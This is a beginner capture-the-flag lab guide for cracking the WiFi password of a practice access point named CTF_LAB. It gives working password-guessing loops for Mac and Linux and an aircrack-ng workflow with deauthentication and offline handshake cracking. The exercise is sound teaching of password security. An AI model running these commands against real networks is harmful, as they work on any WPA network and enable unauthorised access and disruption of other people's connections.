In this lab, you will learn how to brute force the WiFi credentials of the CTF_LAB access point. This is the first challenge in the WiFi CTF competition and teaches fundamental concepts of password security and dictionary attacks.
Challenge Objectives:
- [ ] Find the wifi network
- [ ] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
BEFORE YOU START
Prerequisites:
- The CTF Lab Raspberry Pi must be powered on and running
- The WiFi Access Point should be broadcasting (wait ~1-2 minutes after power-on)
- You should have a laptop or mobile device capable of WiFi scanning
- IMPORTANT: DO NOT PERFORM THIS WORK ON A CORPORATE OR MANAGED LAPTOP. Use a personal computer you own, as security/IT teams may flag hacking tools as malicious software
What You’ll Learn:
- WiFi network reconnaissance
- Password dictionary attacks
- Command-line automation with loops
- The importance of strong passwords
Discovering the WiFi Network
The Raspberry Pi CTF Lab operates as a WiFi access point that you can practice ethical hacking against. About 1-2 minutes after it is powered on, it will broadcast a WiFi network with the SSID (network name):
CTF_LAB
Finding the Network
You can discover this network from any WiFi-capable device:
On Mobile Devices (iOS/Android):
- Open Settings → WiFi
- Look for the network named
CTF_LABin the available networks list
On Mac:
- Click the WiFi icon in the menu bar
- Look for
CTF_LABin the network list
On Linux:
# Scan for available networks
nmcli device wifi list
# Or use iwlist
sudo iwlist wlan0 scan | grep -i "ctf_lab"
On Windows:
- Click the WiFi icon in the system tray
- Look for
CTF_LABin the available networks
Progress:
- [x] Find the wifi network
- [ ] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Manually Guessing a Password
Now that you’ve found the CTF_LAB network, you can try connecting with some common passwords. Try a few guesses manually:
password12345678adminctfsupervisor
Unless you’re very lucky (or very strategic), you probably won’t guess it immediately. This demonstrates an important security principle: password strength matters.
Why Dictionary Attacks Work
You might wonder why manual guessing is ineffective, but a dictionary attack can succeed. Here’s the key insight:
Password Space vs. Memorable Passwords
- Total possible passwords: With lowercase letters, uppercase, numbers, and symbols, an 8-character password has over 200 trillion possible combinations
- Memorable passwords: Most people choose passwords they can remember, which drastically reduces the search space to maybe a few million common choices
Since humans tend to use memorable passwords (dictionary words, names, common phrases), attackers can:
- Start with a list of commonly used passwords
- Try these first before resorting to true brute force
- Often succeed without testing billions of random combinations
This is why password managers and randomly generated passwords are so important for real security!
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Finding a Dictionary
Let’s try to find a common password list. You can do this by searching google for the following phrase:
“10k most common passwords”
you should see a link to a github repository show up that’s at the following url:
Browse to the page. Click on the button labeled “raw” on the right side of the page. You can then save this file to your computer by clicking on the file menu for the browser and selecting “save as.”
When you click on Save as, a dialog will show up:
You’ll need to create a directory for starting our hacking. You can do this from within the dialog by clicking on New Folder. Name it HackingLab and click Create.
Then go ahead and click on save. You’ll now have a file called “10k-most-common.txt” in the Hacking lab direcotry. Let’s learn to view the file from the command line. Let’s use spotlight to open up the terminal by hitting command and space simultaneously, and then typing in terminal:
Change into your HackingLab directory by typing the following:
cd HackingLab Now that you’re in the HackingLab directory, let’s view the password file:
more 10k-most-common.txt
You’ll see that each row of the file contains a password.
Hit q to leave the more command.
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Finding a Command to Connect to WiFi Networks
Now we have a password list – we need to figure out how to automate connection attempts. The approach varies by operating system:
Mac OS
Search Google for “Connect to wifi from command line mac” to find resources. Here are the key commands:
Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
Connect to a network:
networksetup -setairportnetwork en0 <SSID_OF_NETWORK> <PASSWORD>
Try running the airport -s command to see available networks. You should see CTF_LAB in the list.
Testing a single password:
networksetup -setairportnetwork en0 CTF_LAB somepassword
When you run this, your WiFi will disconnect temporarily. If the password is wrong, you’ll see an error message.
Linux
Using nmcli (NetworkManager):
# Scan for networks
nmcli device wifi list
# Connect to network
nmcli device wifi connect CTF_LAB password somepassword
Using wpa_supplicant (manual):
# Create config
wpa_passphrase CTF_LAB somepassword > /tmp/wpa.conf
# Connect
sudo wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf
Windows (PowerShell)
# View available networks
netsh wlan show networks
# Connect to network
netsh wlan connect name="CTF_LAB"
For automated password testing on Windows, you’ll need to create a WiFi profile XML file for each password attempt, which is more complex than on Mac/Linux.
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [x] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Automating the Dictionary Attack
Now for the exciting part – we’ll automate the password testing using a loop that tries each password from our dictionary file!
Mac OS Script
At the terminal, type the following lines and hit Enter at the end of each line:
while read passwordfilevalue; do
networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"
ifconfig en0 | grep inet
echo "Tried password: $passwordfilevalue"
done < 10k-most-common.txt
What this script does:
| Command | Purpose |
|---|---|
while read passwordfilevalue; do | Creates a loop that reads the password list one row at a time |
networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue" | Attempts to connect to CTF_LAB using the current password |
| `ifconfig en0 | grep inet` |
echo "Tried password: $passwordfilevalue" | Prints the password we just tried |
done < 10k-most-common.txt | Reads from the password dictionary file |
How to detect success:
- When you see an
inetline with an IP address (likeinet 192.168.4.100), you’ve connected successfully! - The password printed immediately before the IP address is the correct one
- The CTF_LAB network uses the
192.168.4.0/24subnet, so successful connections will show an IP like192.168.4.X
Linux Script
while read passwordfilevalue; do
nmcli device wifi connect CTF_LAB password "$passwordfilevalue" 2>&1
if [ $? -eq 0 ]; then
echo "SUCCESS! Password found: $passwordfilevalue"
break
else
echo "Failed password: $passwordfilevalue"
fi
done < 10k-most-common.txt
Advanced: Using Aircrack-ng Suite (Linux)
For a more sophisticated approach, you can capture the WPA2 handshake and crack it offline:
# 1. Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0
# 2. Scan for networks
sudo airodump-ng wlan0mon
# 3. Capture handshake (note the channel and BSSID of CTF_LAB)
sudo airodump-ng -c <channel> --bssid <BSSID> -w ctf_capture wlan0mon
# 4. In another terminal, deauth a client to force handshake
sudo aireplay-ng -0 1 -a <BSSID> wlan0mon
# 5. Once handshake is captured, crack it
aircrack-ng -w 10k-most-common.txt ctf_capture-01.cap
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [x] Find a command to use to connect to wifi networks
- [x] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [x] Launch the attack and discover the credential
What You Should See
As the script runs, you’ll see:
- Each password being tried
- Connection errors for wrong passwords
- When successful: An IP address in the
192.168.4.Xrange appears!
The password is somewhere in that 10k common password list. Watch the output carefully to catch the successful connection.
Hint: Think about common passwords related to oversight, management, or authority. The CTF_LAB password is a common English word.
Next Steps
Once you’ve successfully connected to the CTF_LAB WiFi network, you’re ready to:
- Scan the network to find a registration resource
- Register
- Access the dashboard
- Begin exploring the web services and system challenges
- Start earning points!
Congratulations on completing your first challenge! You’ve learned:
- WiFi reconnaissance techniques
- The power of dictionary attacks
- Why password strength matters
- Basic bash scripting for automation